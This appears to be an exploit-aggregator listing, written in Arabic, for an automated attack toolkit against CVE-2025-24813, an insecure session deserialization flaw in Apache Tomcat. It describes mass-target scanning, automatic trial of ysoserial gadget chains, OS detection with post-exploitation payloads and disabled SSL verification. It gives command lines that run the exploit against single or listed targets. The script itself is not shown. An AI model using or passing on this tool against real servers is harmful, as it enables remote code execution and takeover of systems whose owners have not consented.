## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-CYGLEGIT-CVE-2025-24813
# مجموعة أدوات استغلال CVE-2025-24813
هذه أداة استغلال متقدمة وآلية لـ **CVE-2025-24813** ، تستهدف خوادم Apache Tomcat المعرضة لثغرة إلغاء تسلسل الجلسة غير الآمنة.
## 🔍 الميزات
* مسح متعدد الأهداف من ملف أو عنوان URL واحد (`--targets` / `--url`)
* اختبار تلقائي لسلاسل الأدوات (CommonsCollections1-7, BeanShell, Spring, إلخ.)
* كشف نظام التشغيل وحمولات ما بعد الاستغلال (Linux/Windows)
* اكتشاف معرف الجلسة من نقاط النهاية الشائعة
* تسجيل مفصل لكل من وحدة التحكم والملف
* دعم TLS (HTTPS) مع إمكانية تعطيل التحقق من SSL اختيارياً
## ⚙️ الاستخدام
root@kitploit:~
# Single target
python3 exploit_cve_2025_24813.py \
--url http://target:8080 \
--ysoserial ysoserial.jar \
--no-ssl-verify
# Multiple targets from file
python3 exploit_cve_2025_24813.py \
--targets targets.txt \
--ysoserial ysoserial.jar \
--no-ssl-verify
## 📥 المتطلبات